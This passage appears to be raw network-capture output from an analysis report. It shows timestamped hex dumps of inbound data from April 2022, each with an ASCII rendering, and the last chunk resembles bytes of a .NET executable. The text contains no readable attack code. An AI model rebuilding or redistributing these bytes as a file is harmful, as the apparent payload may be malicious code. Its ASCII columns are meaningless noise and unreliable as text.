                                                  2022-04-23 06:15:18 UTC2077INData Raw: 0f 76 e8 d9 04 a0 69 9d 49 07 09 94 5c 34 0e c5 09 80 6f 3b ba f8 e4 5d 94 2b 98 20 15 6d 2a 0f 51 72 26 6c d2 d9 03 82 43 24 d9 eb 9d a0 7a 41 c6 3b c2 2f 4c 6b 39 38 6e fa ac 37 f5 38 3c 4a 75 05 f8 73 0d 42 db 12 c5 ba 79 56 54 93 26 9e d3 b5 7a e6 6c f9 df d6 d5 15 a5 fb 8f b7 f6 22 90 78 5b b7 64 95 d4 d3 e4 c5 6b f3 bf 65 a1 b6 98 90 94 d3 e4 0f 1b 80 f6 ca 5c 64 3a 57 03 02 5c d0 a4 45 e3 45 1d 83 a5 0c cc 82 2b 42 54 aa b3 82 7d e1 01 49 6a 2d d8 a9 2d bd 4b ac f9 3b dc 07 53 dd 02 9b 7e 07 af c7 b0 b5 d8 6a 79 33 b1 22 d4 fa dc 2f 81 f1 4c af c8 d5 53 54 db 36 eb 33 05 d4 40 db 55 e6 a0 91 0b 12 1e 41 96 b9 93 17 e7 e1 26 09 23 24 77 73 87 a9 e5 a0 31 e2 88 97 7c ba e6 28 8b ea 1d 4a ff 3c 07 15 fe 90 fb 3d 0c 68 5b c8 24 00 00 ff 8a fa 0a ca 3a
                                                  Data Ascii: viI\4o;]+ m*Qr&lC$zA;/Lk98n78<JusByVT&zl"x[dke\d:W\EE+BT}Ij--K;S~jy3"/LST63@UA&#$ws1|(J<=h[$:
                                                  2022-04-23 06:15:18 UTC2081INData Raw: a0 31 0a 71 cb 7a 32 48 ea 17 ca 34 f5 e2 d8 c9 31 de 3c ad 16 3f 4c 33 58 b5 7d 59 03 3f d7 49 53 b0 b9 da 82 49 31 ea 79 98 dd 36 fc 5e 0b 21 0a 65 19 76 87 4a 1d 5c 62 4f 15 6a b4 59 bb aa 77 a5 0a a1 9d fa 55 5c 50 fa 10 e7 f3 88 8c a3 62 03 83 47 6b 14 46 ad 3e 71 35 ee d2 c2 c7 3b 23 36 91 9d 06 33 e1 52 d1 b3 25 0e 15 2b dc 80 6f 58 de 4c 8d f7 52 3d 0c 67 99 de 49 8d 39 45 2f 38 18 3f 0c 34 bf 0d ad 45 b5 d7 41 00 e8 93 bd d6 a1 74 f1 26 78 e9 8f 56 2b 03 28 51 05 c9 7f 05 70 98 33 38 1c 41 e1 a1 7f 37 95 8a b0 13 f8 14 00 d5 07 4c 45 91 27 f0 fd e8 51 51 81 62 4b 94 dd c0 81 3d 16 11 50 41 a0 00 b9 71 db d0 55 0b a2 30 d1 30 31 a3 7b 04 f1 ab 42 92 75 87 88 c5 e2 8e 71 27 01 f1 a1 19 52 70 8b 88 fb a6 45 1c f5 ea 9b 83 22 48 f5 19 8a 45 ee fe fa
                                                  Data Ascii: 1qz2H41<?L3X}Y?ISI1y6^!evJ\bOjYwU\PbGkF>q5;#63R%+oXLR=gI9E/8?4EAt&xV+(Qp38A7LE'QQbK=PAqU001{Buq'RpE"HE
                                                  2022-04-23 06:15:18 UTC2085INData Raw: 10 54 83 8e 1a 27 a2 a7 5a ae dc 94 b9 da f9 81 d2 6e 0c a5 ea e9 5d a6 34 21 26 01 36 d0 7b 28 fa 67 ae ca 47 8f f4 13 49 01 cf df b9 11 f8 91 0f fb 0b c2 59 5d 40 65 27 2e 52 bd 24 0b 3f b8 c0 2f 57 04 9d ba 1b 54 8a 52 fb 1e c1 fd 1d c0 eb d5 7d 81 77 7f fe 30 7f d8 be 06 89 43 66 33 44 4e ba 1c 51 cc 23 19 04 db be d2 77 41 6f a3 75 bd 92 71 a0 54 97 de 8c 38 f6 44 4d a7 09 10 53 71 63 6e ab 4a 46 b8 5c 79 cf 84 9c 3c 74 5a ca 9b ad 2d 92 b9 05 37 b3 29 88 29 72 41 c4 c4 bf 9a 3f a6 2c 61 5a 51 91 4a 2e b3 73 5f 0b 10 60 68 25 3d 89 27 3e 90 23 0b 20 cd 68 96 d8 a6 b7 15 92 c5 bc 9d 54 ad ea 8d ba 27 85 06 57 88 e3 00 23 e3 f8 c7 a5 16 79 b0 dc 87 be 0c a0 d2 9f 9b bb c4 d0 33 7b 60 e9 13 21 47 02 b8 52 36 5a 56 0f ad 06 d2 5c 21 15 98 dc 14 c5 c2 8e
                                                  Data Ascii: T'Zn]4!&6{(gGIY]@e'.R$?/WTR}w0Cf3DNQ#wAouqT8DMSqcnJF\y<tZ-7))rA?,aZQJ.s_`h%='># hT'W#y3{`!GR6ZV\!
                                                  2022-04-23 06:15:18 UTC2090INData Raw: 5e 8f 2c c8 5b 67 65 b8 f9 87 89 d4 a1 fb 9d 32 35 c4 d3 e6 fc bd 32 a4 a4 4d e9 7a 29 21 45 0d ac 3c d5 2a 08 eb 6c 08 9b b8 bc a3 b8 6c d3 7a 0c 2a 91 ad 6c 15 ec 24 8c 89 f6 75 6b a3 26 19 64 b1 45 8f d8 a7 60 d5 b7 d5 b0 ec 86 81 1e 51 f8 aa 82 78 2b 4d bf 9c ec 97 be 97 9b 80 59 fd 9d 10 bf 4e f0 52 3c 0c 86 0a fd 41 5d 1b 3e 4f 53 46 ad 3e 4c 7e 23 86 f1 4b 6e 91 d5 7c c9 29 7a 07 1b 30 68 2c 1b b0 06 2d 05 ed cc d6 8f b1 be 9e f8 39 ab 68 fb 2f 53 b8 7d 20 ec b3 93 d1 34 f9 5e a6 0e 8e 7a f1 75 f9 69 fe 73 41 fa da 10 59 06 62 ea b8 1f cf 52 93 36 45 96 79 35 14 ad b5 3c 14 20 a6 a4 2d 1f 60 fa 33 46 65 36 30 2d 8d 1b 09 38 0b d0 e4 4f ef cd eb 6f 29 38 0b 35 d3 6e 02 f8 8e a3 97 96 00 3e 80 74 2d 5c 5d 69 09 97 51 76 c9 92 bb f4 11 e8 9d 62 15 fa
                                                  Data Ascii: ^,[ge252Mz)!E<*llz*l$uk&dE`Qx+MYNR<A]>OSF>L~#Kn|)z0h,-9h/S} 4^zuisAYbR6Ey5< -`3Fe60-8Oo)85n>t-\]iQvb
                                                  2022-04-23 06:15:18 UTC2094INData Raw: 7f 5f a6 44 58 70 54 2f be 26 e0 3c bf 18 2b 4e 6e cb d5 cc 82 a1 38 76 cf 69 ff b4 64 53 34 7d a6 06 ad 81 ef 2c 26 17 f8 3c d3 f3 88 6e 06 44 96 38 ab d1 1f 68 94 a8 f8 ae 79 18 68 30 fc 18 cb 47 2f 87 ef 4d 1d 29 40 85 08 7a 99 11 6b e9 2f 76 25 5e e6 fd 1a 4c 64 8b ac 89 e9 64 39 7e 37 23 07 ec 71 c8 5c 17 c5 ba 5e e5 8b f6 2f 8d 89 8c 42 f6 77 a8 5d ab 56 29 ca b0 cb 66 46 ff b1 36 e9 0b d6 78 c9 77 ea ce b2 bc 9d 69 a1 54 f0 f4 da da a9 cb 63 66 e3 7e 15 7a d0 62 de fa b8 8b dc 39 1b 7c fb cf 5c c7 7e 07 68 14 13 b7 e5 99 62 76 53 0e 1a 89 37 cf 9f 13 45 4d a6 39 00 34 d4 5c 93 2c aa 93 00 8e 43 ec ea be e0 79 18 7b 21 02 f1 48 71 b3 b3 b4 77 02 72 82 f1 6e b3 5b 4c 0a 5f 46 e6 92 9a 27 dc a3 fa 1a 82 fd 5e 21 a7 b5 61 a9 46 56 51 6c 2b ee 6c 26 e7
                                                  Data Ascii: _DXpT/&<+Nn8vidS4},&<nD8hyh0G/M)@zk/v%^Ldd9~7#q\^/Bw]V)fF6xwiTcf~zb9|\~hbvS7EM94\,Cy{!Hqwrn[L_F'^!aFVQl+l&
                                                  2022-04-23 06:15:18 UTC2098INData Raw: ee 73 ca f8 8f 38 6c af b2 ee a1 28 86 b9 d4 9b 90 88 93 94 a0 30 c8 03 60 b3 10 1b 46 99 5a 84 61 16 0b ec f3 e7 a5 3b 10 26 7b 24 b7 03 30 27 6c 57 4b f5 b8 a0 70 e9 98 f8 72 16 f8 0e a0 1f 9a bc 2d f7 2d c6 d4 fa b2 79 0f e8 ca 98 e1 f2 1e 7b b9 72 ab 9f 35 9f 11 bf 01 e0 1d 58 5a 9d b0 2a 38 c0 b3 92 b7 d7 5d eb 33 c1 7e 51 3d 0b 76 8f 73 99 59 cc 1c 59 d5 7d 85 a4 59 b6 7b 35 ac 87 b4 63 5b a4 59 b8 8d 4d 74 25 7c a2 31 89 08 5c d9 b2 b4 23 7f 7e 4a f0 e4 86 aa a4 f7 fc 92 99 1f ad e6 5e 04 37 c8 84 14 f0 3c 96 25 e9 e1 b9 4c c6 8b c8 32 09 4d 58 d4 4d 2c 55 6e 1b 00 4f 79 3c c3 d8 4a bc a3 9f a2 6f e3 ae 82 f7 50 03 5b 89 e8 04 7e b7 ef cb 00 7c b1 fd ec 02 78 ed fb dc 8b 40 5d 81 a5 ca 70 4e 98 4f 62 69 70 33 5f 6c ae 33 6c 0e 61 4e ea 00 42 57 a8
                                                  Data Ascii: s8l(0`FZa;&{$0'lWKpr--y{r5XZ*8]3~Q=vsYY}Y{5c[YMt%|1\#~J^7<%L2MXM,UnOy<JoP[~|x@]pNObip3_l3laNBW
                                                  2022-04-23 06:15:18 UTC2102INData Raw: c4 8f 28 ed 29 85 76 aa 70 86 d0 e0 85 b3 55 84 41 05 48 6c ed 43 c0 16 23 69 1a 15 7d 23 21 0c e3 88 88 2e a6 6d 5f 35 2b 41 f9 5a fe e7 1f 9f aa d3 24 a6 8b 91 e4 de 89 64 75 4a 46 09 c1 3f db 6f 59 ee ff 5d f8 31 a7 30 82 20 8c 58 b4 7d 81 72 2c b5 39 04 59 6b b4 39 8c cf 5b 28 32 d5 bf 8a e2 23 8d dd 23 6f 08 a8 d7 9a 4d 13 24 9f d0 ed 7e 6f 2f cb 98 14 39 e1 27 4e b8 78 bd c3 af c1 0a 3f 38 7b a2 0b c2 6a e4 ed 4d 6c 08 9a d5 c8 47 97 3c 11 40 df 7b c4 b7 0f 4b 6f 84 67 6a 09 19 8e df 43 c0 f8 d1 07 c8 d7 4f 54 56 47 c0 87 a1 f3 e5 32 6a 18 ea 6d 88 17 f6 18 3c e3 d5 13 5a 88 0c 05 5d 5c 02 28 cb cb 45 14 b9 11 45 8d a5 5c 27 04 ac ec 09 85 93 ee 05 06 5c 7f ea 85 92 6c 69 41 f0 6c eb 25 0a 52 57 a2 b5 72 ec 91 20 d7 a4 f1 fe 6c 1d 2c 6e 3d fb 46 b8
                                                  Data Ascii: ()vpUAHlC#i}#!.m_5+AZ$duJF?oY]10 X}r,9Yk9[(2##oM$~o/9'Nx?8{jMlG<@{KogjCOTVG2jm<Z]\(EE\'\liAl%RWr l,n=F
                                                  2022-04-23 06:15:18 UTC2105INData Raw: cd c8 27 ce 5e 5d ae 61 5a f6 ca 29 0e 9e d1 08 7e 0b af 1d e6 b6 50 9d 94 c6 fa d3 e9 14 88 ba f8 d7 12 6d 82 2c c2 99 19 11 cc 2c a7 5c bd a6 9f 4e c7 f3 8b bc 3b ee 99 77 d4 96 e4 ae 98 fe a0 d7 d2 29 04 b7 c0 ab a0 32 1e ec 0d 58 98 e2 c2 24 2c ba 0b 28 37 b7 1d d2 aa 84 bb fb f8 81 fe d3 ec f1 e8 52 62 b3 b7 86 98 50 d2 6c c1 bc aa f2 2f 15 14 82 9e 5a fb 71 55 ca 16 2a af ac c2 f3 00 4c 0c cc 87 53 03 89 da c5 8f 23 a0 f8 0e 15 e2 29 5b 36 81 f7 8e 75 43 bb 56 c5 6f f8 f6 26 4b 59 45 8b 85 9d 09 cb 73 38 33 73 b9 01 8e 87 7b aa f7 e7 1d b1 04 24 69 14 0b fa bb c6 8c 54 96 d4 12 a2 dd 1a 81 b5 1b b6 01 d3 dc d7 71 74 cb f4 84 9c 58 81 05 ac c0 48 d0 4f fb 3c 40 fd d0 d4 77 93 6d d5 cf 2e 92 c7 73 d7 7b 6e c7 e4 df bd 89 e3 c0 df 2d e2 68 27 42 a1 f9
                                                  Data Ascii: '^]aZ)~Pm,,\N;w)2X$,(7RbPl/ZqU*LS#)[6uCVo&KYEs83s{$iTqtXHO<@wm.s{n-h'B
                                                  2022-04-23 06:15:18 UTC2109INData Raw: 30 2d 41 35 e6 fb 9e 4b 45 d8 c9 db 97 f4 28 f4 f6 23 71 7f ad 13 a5 df b3 50 ef d2 87 af bf 07 79 0f 9f a2 77 ae 0a 7c 4c 01 9f 39 f6 26 0d 8d ac ec 03 5f 59 20 1b bd 91 9b b6 b4 17 88 4f 91 76 59 c5 b4 ff e2 d3 47 b3 99 e0 93 a1 d3 83 8c 93 ab 0d 42 fb 70 ba c5 05 99 a4 fb a9 c8 88 3a 55 c2 34 12 dc 72 59 a0 26 14 12 98 43 45 52 4c 37 b6 af 98 18 c5 fe af fe 00 d7 01 64 a0 4a 48 00 b8 ad c4 de 4e 20 c7 f6 ea 2e 79 17 fb 53 4e e6 90 c1 e7 e0 54 72 9a d5 5f 40 58 83 9f 00 83 4f 43 60 67 a5 3d 8c 3c 52 36 e3 0c 7c 43 29 0a 25 bb d9 d3 a7 28 73 ce da ca 35 c6 71 de 1e 29 7a 8a 7d 1d 60 59 11 04 18 ab 6b 53 34 c7 1f e1 68 a1 bb 76 66 b3 a1 f1 fe a1 51 b1 a0 c2 15 0a 15 0f 07 78 04 e7 e4 24 cd e2 ce 5c 3e e5 a8 28 3e c4 cb 10 ac af 0a ad 92 1a 72 fc 35 ad eb
                                                  Data Ascii: 0-A5KE(#qPyw|L9&_Y OvYGBp:U4rY&CERL7dJHN .ySNTr_@XOC`g=<R6|C)%(s5q)z}`YkS4hvfQx$\>(>r5
                                                  2022-04-23 06:15:18 UTC2120INData Raw: 9a 20 ec 4a 3c 1e 50 23 17 16 06 25 81 b3 58 6f f3 4f 84 0a 90 a9 c3 cb 83 4c dc 8b 76 60 b7 f7 c0 6d 8f f5 18 66 ba a3 26 e6 f1 dd d7 07 5f 2e 1e 22 70 5c b0 2c 7c 04 a6 87 62 ea 2e a8 97 65 29 e9 46 0c d0 16 34 88 0d 7e ca ba 03 75 32 cd e8 b0 35 cd e3 bc f4 97 b6 dc b8 b4 39 22 f1 92 2a 0e d4 ea 49 d4 e5 5d 78 41 6a ce c7 de 84 39 94 e0 e6 f6 39 13 ab a8 e6 07 c4 c9 cd 4f be 6d 56 74 cb 6e ed de ed 3b 3f 3e e2 30 de fd 80 16 ae 26 30 75 69 ce 13 d7 cd 05 a9 8c 1f b9 10 60 e4 3e 13 e4 d5 0e 47 47 fa 49 b8 2c ef 7b 83 e1 f7 33 0a 55 98 31 db bd d3 ef 9c 2b 98 8b 79 b5 1c aa 43 91 a9 46 86 da 43 58 71 84 ae 55 3e 8c f4 20 2a 35 fa 03 53 85 56 c5 97 f8 9c 58 3c 31 c9 28 73 93 b3 f4 ad b6 ce 77 d8 ac 68 5c aa 7d 06 57 e3 cf 69 1a 4a 2c c7 87 5f db 09 99 fc
                                                  Data Ascii: J<P#%XoOLv`mf&_."p\,|b.e)F4~u259"*I]xAj99OmVtn;?>0&0ui`>GGI,{3U1+yCFCXqU> *5SVX<1(swh\}WiJ,_
                                                  2022-04-23 06:15:18 UTC2125INData Raw: ba 24 de e8 07 18 c5 14 f9 d6 20 f4 89 3d 4b 6a cd c3 2d 2b ec 65 9f 67 26 18 57 a6 2d 76 1a a4 ef 39 f1 0f ae ff e1 7e 7d 7e a1 dd fe 7e a2 bd 46 3a d6 46 7e c4 e2 9f 24 c2 a8 53 cb 32 82 8a ad b3 f4 4a 2c 02 40 6a 73 79 aa 5a c8 f5 ed ed 1e be ba c2 f8 01 29 da 9d de 02 ee 49 ab ee 1b e0 3a c1 e1 3e 6f 48 d5 56 70 75 37 d1 6d d0 8d 03 74 e4 20 ce f6 d6 0e e6 1e 95 c5 82 06 1d 57 d8 24 aa a5 c4 8a c2 06 ea b1 2b 7b 70 ce 43 64 81 b5 1e e5 26 39 6f 77 69 20 6c b7 0c 18 49 b8 2c b6 76 0c 22 12 e3 64 b5 1e 20 cc 77 0f 71 a5 d1 f3 b0 48 f2 b1 9a 91 b4 33 78 b2 15 10 ed aa 02 19 51 0e 99 ae a3 0a 98 2e 18 1b af 44 29 e9 de 53 d2 72 8f 66 b4 a5 3c 1d d5 2c 72 fe 9e 46 e7 98 d4 ee 14 e4 f1 ff 87 12 e9 a0 97 a7 78 d9 e9 47 d7 1b 81 e1 2f d6 c5 40 04 0a 91 68 41
                                                  Data Ascii: $ =Kj-+eg&W-v9~}~~F:F~$S2J,@jsyZ)I:>oHVpu7mt W$+{pCd&9owi lI,v"d wqH3xQ.D)Srf<,rFxG/@hA
                                                  2022-04-23 06:15:18 UTC2141INData Raw: bd 10 92 e8 6b c5 8a 06 11 a2 28 7e 62 3a 43 38 88 dd 5f 1c 05 e7 78 47 be e2 4e e7 d2 c4 41 d0 3d d0 a2 95 06 8a 43 43 e8 5f e4 26 56 c8 a6 f6 97 bf 3a 55 1f 4e 48 db 5c 52 0b 8f 32 15 5b 19 f3 90 da 97 2b ad f3 e7 46 d9 b3 53 96 7f fd f2 ad 89 7c 07 90 e4 11 e6 6b 53 3f 6b f5 92 bc 58 bc de b2 d2 78 fc d7 bb a5 64 5d a5 77 21 42 48 e9 77 b8 7d 4a 25 05 2a 88 6d 74 6e 98 d0 3b 79 b1 4e a7 ce 2e 76 58 24 16 15 91 23 13 20 6b 49 6b e0 76 ff 95 63 66 e1 90 36 f6 61 bc d7 49 66 07 76 8a b0 1d b4 c5 df 2c 95 d1 b7 84 22 84 bf 4c 41 d3 e9 b4 3d 63 16 ad a3 d3 5e 2e c8 39 57 a8 22 0d 03 e4 9a c5 48 a1 25 64 bc a0 8a b0 21 30 48 2b 56 e7 30 cf ba 2f 24 b1 ab e8 41 8d e1 96 7a 5f 8d 91 b7 76 d9 9d c9 1c 5b ff 57 85 72 0e e2 93 9d 5b f6 ad 68 8e 0a da a9 2b 36 a5
                                                  Data Ascii: k(~b:C8_xGNA=CC_&V:UNH\R2[+FS|kS?kXxd]w!BHw}J%*mtn;yN.vX$# kIkvcf6aIfv,"LA=c^.9W"H%d!0H+V0/$Az_v[Wr[h+6
                                                  2022-04-23 06:15:18 UTC2152INData Raw: 10 bb 3f 10 33 fd 76 c6 42 3a 84 78 71 9e 32 53 dc 73 d6 2d 2e 65 df a7 2d e8 ef 08 9f 6c 1a 15 b3 64 7d 61 4a 94 bc 31 39 06 45 12 7b 07 39 27 6b 55 e6 46 59 6c 9d f4 03 bc 22 0c f2 d4 d9 cb be 91 12 aa 99 6f 80 be 65 1b d0 ec 83 2d 67 7c de 3c f9 19 15 bc f1 8b 82 cd 4c 6f 18 96 51 02 c3 2a b4 c0 fa 2d 13 f1 71 62 85 f5 0a 33 55 b7 c5 46 64 16 70 8a 0e 48 fd 42 3f 64 3c 88 2f ac 81 92 0b d1 c3 f1 54 e8 53 cc 38 00 1b b3 74 d6 28 97 cd 9a 40 5d 6c cd 0c 8f 6c 89 93 e8 b6 8e c1 b5 1d fb a3 eb 14 9f c8 92 82 5d bf 7e 3e e7 1f 02 b7 8a 35 5e 11 f2 b7 42 c0 b9 67 49 11 8c 05 ca 66 45 67 15 64 05 dc 0e b1 8e 45 11 c7 47 a6 91 cb b2 aa 25 f9 13 da 80 9d 81 58 69 84 73 0c 13 20 d6 42 b8 97 41 8f 2a a1 f3 7d c4 a6 a2 57 a4 1d 36 f1 b7 bf 30 82 4b a3 bf 0b 31 51
                                                  Data Ascii: ?3vB:xq2Ss-.e-ld}aJ19E{9'kUFYl"oe-g|<LoQ*-qb3UFdpHB?d</TS8t(@]ll]~>5^BgIfEgdEG%Xis BA*}W60K1Q
                                                  2022-04-23 06:15:18 UTC2168INData Raw: 58 9b 29 77 f6 94 04 11 68 b0 fa cd e7 c5 e0 bd f0 cd a3 b8 56 30 a5 95 1f 43 1e 77 63 c3 09 d3 b3 f9 2b 3d 20 47 5b 55 ec 6e 30 59 e3 c5 f4 32 4e 59 d8 7b a4 44 b4 b9 fa 25 32 24 03 63 c0 33 62 db e5 53 7c 6e 8b 63 90 52 a5 5f 5f 1d 29 f7 ce 66 d3 99 52 be 4b 53 6a 21 74 52 97 03 92 18 66 17 d1 67 1b 53 e7 44 74 0f 8e d4 5a ef d0 2d 9b be 5c a8 d1 cf eb e4 f9 8e 29 c2 9b 7e 5c 28 82 b7 f4 06 4a 83 48 6e 3a 1a 2b 38 1e 01 c4 cf ec cb c2 b7 73 e1 7d ba 7e 6d cf 45 3d 1b f8 2d 84 9e eb 32 ee 31 19 ec 01 d2 70 87 66 69 60 24 f9 97 5f 29 b7 2d 29 4f 3d 12 6e 25 52 e7 b0 2b 4f 59 67 02 23 c5 d5 c9 3a 22 b1 02 0c 5a f5 57 51 85 54 1b 8e 25 a5 eb 9a 37 33 18 03 13 f3 e1 2e 38 2d b0 97 b9 9b 6d ae ff f6 e5 59 8e 5c d4 61 77 30 ff 05 e9 2f 49 39 2f 0d 0d ff 49 0d
                                                  Data Ascii: X)whV0Cwc+= G[Un0Y2NY{D%2$c3bS|ncR__)fRKSj!tRfgSDtZ-\)~\(JHn:+8s}~mE=-21pfi`$_)-)O=n%R+OYg#:"ZWQT%73.8-mY\aw0/I9/I
                                                  2022-04-23 06:15:18 UTC2184INData Raw: dc 95 fb a5 4d b1 8a 01 f6 81 16 7f ce ab fe 42 42 bb d8 ef ac c4 49 7e 19 60 92 5a cb 82 de b2 de ee 3b eb 19 2a 25 7c fc 54 1e 50 25 a9 b6 ec 29 53 9a 7a 96 5b 87 36 f8 10 46 c3 14 94 ad df e7 96 12 bd 44 87 e2 ed 9f ec 4a 12 46 91 fd 7c 12 d2 86 47 5a 28 bd ae 8b ba c0 65 e8 8b ac be 2b d9 bb 82 2c e8 d0 41 f0 c2 d5 51 68 6f f9 f4 fa 22 76 df 75 1b 0c aa 18 a2 fc fd 32 b9 d8 60 c1 b4 c1 e4 bb b4 93 b0 e0 67 a9 1f d7 da b2 0f 75 9c 21 c0 fa 80 65 1a 16 83 fd 93 dc 9b 6c bf c2 27 64 0a fc e9 de 93 08 a5 53 1a 90 da 98 31 77 95 f6 20 1f d5 16 43 dc 1e e3 a5 85 b7 46 4d 68 dc 48 d3 ef 15 6e 7e 96 22 d3 c4 3e 74 3c 2e e7 87 f5 a8 84 30 a1 9c fa f9 e6 3d 15 8d f6 29 2f 2b 59 38 3e e6 29 76 a8 5a dc 98 3a 30 19 40 de 23 56 1a 8d 1c 02 e4 e7 a6 d6 17 ef 85 eb
                                                  Data Ascii: MBBI~`Z;*%|TP%)Sz[6FDJF|GZ(e+,AQho"vu2`gu!el'dS1w CFMhHn~">t<.0=)/+Y8>)vZ:0@#V
                                                  2022-04-23 06:15:18 UTC2200INData Raw: c1 79 83 57 37 7b 33 f1 ee 91 bb ad 06 3a 12 31 f9 59 76 c5 b2 4b 19 31 b2 e1 59 7e a9 8a 0c 4a c3 47 35 a4 51 eb a9 80 58 38 1f 0f ec 22 30 2b 06 2f 8b f5 3a 84 b6 12 d7 78 c2 f9 ef dd 04 97 f0 76 55 32 6f a2 3a b2 e8 6d 77 76 72 ed ba 38 c0 e4 cf 96 48 dd 84 d6 26 77 b2 d1 dd 70 55 df c6 ed f5 c6 75 04 9c 98 c5 0d 7e 49 d4 55 b9 b5 1f 0a 10 96 e7 54 52 f7 74 13 fd 5b d4 b8 3c b5 b3 e3 92 a0 c2 16 5a 25 61 dc a7 a3 80 f8 92 58 d0 38 3a 8b 37 60 67 a5 8e 95 53 d4 30 c7 38 c4 2d 86 e4 f2 86 2f da e1 0b b3 db 13 67 b1 28 7f 68 1c 08 d4 b1 5b dd d2 cb 60 b0 9b 77 7a ba b3 70 23 cf a0 e4 9a 95 b9 20 9c 5a ed 6d 1e 1d 16 6b 79 92 14 b5 95 3f 5a 5d ba a4 e7 28 29 71 98 4e b3 29 de f0 51 71 4a 88 71 38 3f 3c 15 14 55 84 40 83 d2 f9 18 36 e5 3f 9d 8f 2e 47 9d f3
                                                  Data Ascii: yW7{3:1YvK1Y~JG5QX8"0+/:xvU2o:mwvr8H&wpUu~IUTRt[<Z%aX8:7`gS08-/g(h[`wzp# Zmky?Z]()qN)QqJq8?<U@6?.G
                                                  2022-04-23 06:15:18 UTC2216INData Raw: 6d 3d 2c d0 a8 bb b7 16 2e 25 4a 41 99 d7 1b 45 d7 6a 39 7d 3e 30 ce 2a c7 b7 2f b8 ba 1d 45 3b 76 ab 52 4b 69 57 50 46 ae 49 94 1e b7 5e 28 74 4e 9a 6f 77 98 61 86 45 e7 00 b9 a1 9a 4d a3 04 ac 68 fe e6 67 7d d3 43 d5 fe da 48 38 a1 34 5d b6 61 77 e4 bc ca f5 d0 9c 14 01 c6 ce 63 cf f5 d8 d1 ca 9e 13 9c 6d 1a 9a e6 4b 1a 03 87 1c 15 fc 05 44 e6 10 4c de 06 09 61 7e c5 0b 16 83 69 98 f3 c6 0e ff 72 b2 8f 2e 13 37 8d b1 11 50 23 eb 91 17 21 df fb 12 3d 48 44 fb 13 b8 cb c0 b9 39 c3 06 2d c9 29 57 c8 38 45 a9 d1 19 8d ae d7 a9 78 21 70 ff 46 2d 85 64 66 4b 8a 75 24 f6 1b 1c 3f ab 29 d5 c2 e6 11 40 cd 38 ae c0 d0 92 db e8 64 9a c2 1c 63 e6 3e 49 30 78 2d ed 0e 50 de 9d 5b a9 aa 19 78 c6 2c ee 94 e5 72 36 f3 25 ee 0c f2 47 16 6c 00 50 8c 35 2a 9e 42 33 aa e2
                                                  Data Ascii: m=,.%JAEj9}>0*/E;vRKiWPFI^(tNowaEMhg}CH84]awcmKDLa~ir.7P#!=HD9-)W8Ex!pF-dfKu$?)@8dc>I0x-P[x,r6%GlP5*B3
                                                  2022-04-23 06:15:18 UTC2232INData Raw: 72 89 03 cc 78 c6 01 52 e7 89 3d a2 75 5a 72 38 df 95 d1 4b 3d 8f 3d 22 68 e5 55 df f5 b6 2e 05 c4 4b 56 75 ab 88 3f 82 fe 1e e5 fa 56 92 a5 eb a5 63 d2 77 a2 69 4b 2c ab d5 f1 8f 16 fd 8d ab 6f 62 b7 92 41 e2 d2 07 cb e7 0a 32 2e f0 a8 25 28 ed 4c c1 26 65 6f d4 22 5f b7 a4 5e 31 0d f2 4b b7 5d b3 3b d0 b8 f9 e1 33 7d 89 6e 2c e4 3b fd 9c 00 50 da ea fe 04 15 7b 70 fa 72 75 c9 ef 6a 49 ed 2d d0 19 c9 30 d7 9e 2e 6e 55 65 6b 02 84 5a 1b da 8d 8f bd 8b 26 a9 50 fb 79 e4 c6 0b 9a 97 76 58 c1 83 05 d2 bf 4e eb 5a 65 50 6a 0d ac 2b f7 56 86 e0 3a b1 12 fc 87 2c 56 f9 a2 4e 2b 92 22 b9 2d 22 a7 dd f1 b0 60 e7 61 e1 89 a8 e4 3d c0 11 4b ed e2 4f 31 73 9e 7e ed ab 15 45 36 b1 2e 36 56 a9 63 3c 84 ed 75 af c6 7f e1 9c e6 9b ae 3f 77 de db 35 ae d5 4b 52 5b 95 69
                                                  Data Ascii: rxR=uZr8K=="hU.KVu?VcwiK,obA2.%(L&eo"_^1K];3}n,;P{prujI-0.nUekZ&PyvXNZePj+V:,VN+"-"`a=KO1s~E6.6Vc<u?w5KR[i
                                                  2022-04-23 06:15:18 UTC2248INData Raw: b5 f8 a4 1d 65 59 72 e0 50 6d 7c cd a1 d6 69 9f af 0e 10 e7 26 a8 c8 8f 98 f2 06 bf 6e e7 c5 c6 4d 49 ce d3 46 91 54 35 4f 32 24 7a bb 38 5f 7c 92 1b 03 8c 72 4e 79 d0 e7 c8 e4 d6 58 7c 26 83 86 dd 73 4c 00 64 f4 23 57 37 2b a3 bc c3 b9 84 d4 17 31 c7 10 fd 71 38 26 ef e6 ea b5 06 5f 01 e9 b1 06 a5 cc 1b 01 ba ec e6 27 15 44 b2 9a 72 e5 dd 86 de 0c 01 9b f6 9b 54 ed dc 2b bd e6 5f ca 0f c2 87 9c 5e d4 bd 15 4f e4 01 25 b5 09 9a 48 28 86 aa 68 d8 c7 9e 3a 72 5b 7f 40 ab e4 73 e2 ea 84 d4 d0 f8 9b 3b 40 9d 7a b1 c2 c4 0c c7 53 23 ba 44 a4 fa 7e a8 85 08 d9 11 bd c2 cb e9 74 b3 cc 22 19 c3 55 ae 9f 66 a6 52 5d c9 96 f5 9c 60 57 2f 8d 0d 45 95 80 cd e7 e5 6c db 79 e9 eb 35 d9 69 2f ab 50 cf 04 82 a8 38 3f 43 5b 9e ac ca 81 f8 5e 3a 74 93 16 af 16 ca a6 65 8b
                                                  Data Ascii: eYrPm|i&nMIFT5O2$z8_|rNyX|&sLd#W7+1q8&_'DrT+_^O%H(h:r[@s;@zS#D~t"UfR]`W/Ely5i/P8?C[^:te
                                                  2022-04-23 06:15:18 UTC2264INData Raw: 08 d0 25 01 00 00 13 8d 0c 1f 21 2c 04 11 04 13 01 fe 20 1f 06 2c 2b 0b 06 00 00 86 28 09 0a 00 00 69 7e 0d 0a 00 00 cd 28 04 00 00 06 d0 25 01 00 00 13 8d 0d 1f f2 2b 0c ec 2b 0b e6 2b 0a 09 2b 2c 2c 08 26 0c 2d 15 01 fe 40 1f 06 26 12 2d 1d 0a 00 00 69 7e 26 18 2d 1e 5a 1e 0a 00 00 6d 28 11 00 00 2b 00 00 00 93 00 04 30 13 2a eb 2b 0b df 2b 06 00 00 85 28 e3 2b 0a 0d 2b 06 00 00 87 28 07 26 13 2d 19 06 00 00 86 28 06 0a 00 00 69 7e 1a 2d 1c 26 1b 2d 1b 06 00 01 5f 28 2b 00 00 02 28 2b 00 00 01 28 06 00 01 5d 28 11 00 00 2a 00 00 00 40 00 03 30 13 2a f4 2b 0b f2 2b 0a dc 2b 0a 09 2b 07 26 0a 2d 1b 06 26 0c 2d 1a 0a 00 00 26 6f 0a 00 00 3c 7e 06 00 00 bb 28 